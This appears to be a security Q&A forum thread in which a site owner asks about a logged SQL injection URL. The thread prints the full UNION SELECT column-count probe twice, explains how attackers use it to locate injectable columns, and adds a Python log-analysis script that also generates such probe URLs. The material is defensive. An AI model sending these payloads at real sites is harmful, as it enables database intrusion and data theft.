What is this injection attack trying to achieve?

1

My site has been hit repeatedly with this query. I'm wondering what the attacker is trying to gain. The URL is: my.site/content/page.aspx?myID=15641111111111111%20UNION%20SELECT%20cAsT(0x2d78312d512d%20as%20char),/**/cAsT(0x2d78322d512d%20as%20char),/**/cAsT(0x2d78332d512d%20as%20char),/**/cAsT(0x2d78342d512d%20as%20char),/**/cAsT(0x2d78352d512d%20as%20char),/**/cAsT(0x2d78362d512d%20as%20char),/**/cAsT(0x2d78372d512d%20as%20char),/**/cAsT(0x2d78382d512d%20as%20char),/**/cAsT(0x2d78392d512d%20as%20char),/**/cAsT(0x2d7831302d512d%20as%20char),/**/cAsT(0x2d7831312d512d%20as%20char),/**/cAsT(0x2d7831322d512d%20as%20char),/**/cAsT(0x2d7831332d512d%20as%20char),/**/cAsT(0x2d7831342d512d%20as%20char),/**/cAsT(0x2d7831352d512d%20as%20char),/**/cAsT(0x2d7831362d512d%20as%20char),/**/cAsT(0x2d7831372d512d%20as%20char),/**/cAsT(0x2d7831382d512d%20as%20char),/**/cAsT(0x2d7831392d512d%20as%20char),/**/cAsT(0x2d7832302d512d%20as%20char),/**/cAsT(0x2d7832312d512d%20as%20char),/**/cAsT(0x2d7832322d512d%20as%20char),/**/cAsT(0x2d7832332d512d%20as%20char),/**/cAsT(0x2d7832342d512d%20as%20char),/**/cAsT(0x2d7832352d512d%20as%20char),/**/cAsT(0x2d7832362d512d%20as%20char),/**/cAsT(0x2d7832372d512d%20as%20char),/**/cAsT(0x2d7832382d512d%20as%20char),/**/cAsT(0x2d7832392d512d%20as%20char),/**/cAsT(0x2d7833302d512d%20as%20char),/**/cAsT(0x2d7833312d512d%20as%20char),/**/cAsT(0x2d7833322d512d%20as%20char),/**/cAsT(0x2d7833332d512d%20as%20char),/**/cAsT(0x2d7833342d512d%20as%20char),/**/cAsT(0x2d7833352d512d%20as%20char),/**/cAsT(0x2d7833362d512d%20as%20char),/**/cAsT(0x2d7833372d512d%20as%20char),/**/cAsT(0x2d7833382d512d%20as%20char),/**/cAsT(0x2d7833392d512d%20as%20char),/**/cAsT(0x2d7834302d512d%20as%20char),/**/cAsT(0x2d7834312d512d%20as%20char),/**/cAsT(0x2d7834322d512d%20as%20char),/**/cAsT(0x2d7834332d512d%20as%20char),/**/cAsT(0x2d7834342d512d%20as%20char),/**/cAsT(0x2d7834352d512d%20as%20char),/**/cAsT(0x2d7834362d512d%20as%20char),/**/cAsT(0x2d7834372d512d%20as%20char),/**/cAsT(0x2d7834382d512d%20as%20char)--

The first four digits of myID are a legitimate ID. After that, it is obviously a SQL injection attempt. Here is what it looks like with the %20s replaced by spaces and some basic formatting:

UNION SELECT cAsT(0x2d78312d512d as char),/**/ cAsT(0x2d78322d512d as char),/**/ cAsT(0x2d78332d512d as char),/**/ cAsT(0x2d78342d512d as char),/**/ cAsT(0x2d78352d512d as char),/**/ cAsT(0x2d78362d512d as char),/**/ cAsT(0x2d78372d512d as char),/**/ cAsT(0x2d78382d512d as char),/**/ cAsT(0x2d78392d512d as char),/**/ cAsT(0x2d7831302d512d as char),/**/ cAsT(0x2d7831312d512d as char),/**/ cAsT(0x2d7831322d512d as char),/**/ cAsT(0x2d7831332d512d as char),/**/ cAsT(0x2d7831342d512d as char),/**/ cAsT(0x2d7831352d512d as char),/**/ cAsT(0x2d7831362d512d as char),/**/ cAsT(0x2d7831372d512d as char),/**/ cAsT(0x2d7831382d512d as char),/**/ cAsT(0x2d7831392d512d as char),/**/ cAsT(0x2d7832302d512d as char),/**/ cAsT(0x2d7832312d512d as char),/**/ cAsT(0x2d7832322d512d as char),/**/ cAsT(0x2d7832332d512d as char),/**/ cAsT(0x2d7832342d512d as char),/**/ cAsT(0x2d7832352d512d as char),/**/ cAsT(0x2d7832362d512d as char),/**/ cAsT(0x2d7832372d512d as char),/**/ cAsT(0x2d7832382d512d as char),/**/ cAsT(0x2d7832392d512d as char),/**/ cAsT(0x2d7833302d512d as char),/**/ cAsT(0x2d7833312d512d as char),/**/ cAsT(0x2d7833322d512d as char),/**/ cAsT(0x2d7833332d512d as char),/**/ cAsT(0x2d7833342d512d as char),/**/ cAsT(0x2d7833352d512d as char),/**/ cAsT(0x2d7833362d512d as char),/**/ cAsT(0x2d7833372d512d as char),/**/ cAsT(0x2d7833382d512d as char),/**/ cAsT(0x2d7833392d512d as char),/**/ cAsT(0x2d7834302d512d as char),/**/ cAsT(0x2d7834312d512d as char),/**/ cAsT(0x2d7834322d512d as char),/**/ cAsT(0x2d7834332d512d as char),/**/ cAsT(0x2d7834342d512d as char),/**/ cAsT(0x2d7834352d512d as char),/**/ cAsT(0x2d7834362d512d as char),/**/ cAsT(0x2d7834372d512d as char),/**/ cAsT(0x2d7834382d512d as char)--

When I run this query in SSMS, it produces this: all the way up to -x48-Q-. Since this isn't actually querying any data, I can't think of what the attacker hopes to get. Has anyone seen anything like this before?

asked by silvertiger 19.12.2018 - 22:56

1 answer

2

This looks like a simple vulnerability scan.

The SQL UNION operator requires the second query to return the same number of columns as the first, so the attacker will keep retrying, trying to union ever larger selects. If you look, you probably have 48 hits counting up by one each time, not the same 48-column attempt several times.

If one of those attempts results in a page containing -x#-Q-, they will come back and try to craft a real attack by inserting functions to extract table and column names, etc., at position #.

answered by Affe 20.12.2018 - 01:10
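As an added example (not part of the question or the answer above), the following Python script shows what the answer describes from the defender's side: it decodes the hex literals in each CAST(0x.. AS CHAR) back into the -x#-Q- markers, counts the columns in the injected UNION SELECT per request, checks whether the counts seen in a log form the 1, 2, 3, ... ramp of a column-count scan, and lists which marker positions are echoed in a response body. The base URL is taken from the question; `probe_url`, `SAMPLE_LOG` and `SAMPLE_RESPONSE` are constructed here purely as sample input and are not real traffic.

```python
import re
from urllib.parse import unquote

# Base URL and ID modelled on the one in the question.
BASE = "my.site/content/page.aspx?myID=15641111111111111"

def probe_url(n, base=BASE):
    """Rebuild an n-column probe in the exact form seen in the question:
    each column is CAST(0x.. AS CHAR) where the hex spells out "-x<i>-Q-".
    Used here only to construct sample log lines."""
    cols = ",/**/".join(
        "cAsT(0x%s%%20as%%20char)" % ("-x%d-Q-" % i).encode().hex()
        for i in range(1, n + 1)
    )
    return "%s%%20UNION%%20SELECT%%20%s--" % (base, cols)

# Constructed sample log: one legitimate request, then probes with 1..6
# columns (the incrementing pattern the answer describes).
SAMPLE_LOG = ["my.site/content/page.aspx?myID=1564"] + [probe_url(n) for n in range(1, 7)]

CAST_HEX = re.compile(r"cast\s*\(\s*0x([0-9a-f]+)\s+as\s+char\s*\)", re.IGNORECASE)
UNION_BODY = re.compile(r"union\s+select\s+(.*?)(?:--|$)", re.IGNORECASE | re.DOTALL)
MARKER = re.compile(r"-x(\d+)-Q-")

def decode_markers(url):
    """Decode every CAST(0x.. AS CHAR) literal in the request into text."""
    return [bytes.fromhex(h).decode("ascii", "replace")
            for h in CAST_HEX.findall(unquote(url))]

def _count_top_level_items(expr):
    """Count comma-separated items, ignoring commas nested inside parentheses."""
    if not expr.strip():
        return 0
    depth, items = 0, 1
    for ch in expr:
        if ch == "(":
            depth += 1
        elif ch == ")":
            depth -= 1
        elif ch == "," and depth == 0:
            items += 1
    return items

def union_column_count(url):
    """Number of columns in an injected UNION SELECT, or 0 if the request has none."""
    m = UNION_BODY.search(unquote(url))
    if not m:
        return 0
    body = re.sub(r"/\*.*?\*/", " ", m.group(1))  # the /**/ comments are just whitespace
    return _count_top_level_items(body)

def summarize_scan(urls):
    """Distinct column counts seen across requests, and whether they form a 1,2,3,... ramp."""
    counts = sorted({c for c in (union_column_count(u) for u in urls) if c})
    return {"column_counts": counts,
            "incrementing_ramp": counts == list(range(1, len(counts) + 1))}

# Constructed response body: a page that echoed two of the injected columns.
SAMPLE_RESPONSE = "<tr><td>-x3-Q-</td><td>Widget</td><td>-x7-Q-</td></tr>"

def reflected_positions(response_body):
    """Column positions whose marker shows up in the page: the positions an
    attacker would then replace with a real subquery."""
    return sorted({int(n) for n in MARKER.findall(response_body)})

if __name__ == "__main__":
    print(decode_markers(probe_url(48))[-1])   # -x48-Q-
    print(summarize_scan(SAMPLE_LOG))
    print(reflected_positions(SAMPLE_RESPONSE))
```

Run it over real access-log URLs by replacing `SAMPLE_LOG`; a run of requests whose column counts climb by one is the scan the answer describes, and a 200 response whose body contains any -x#-Q- marker is the signal that the page is injectable at that column and should be treated as an incident, not just noise.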
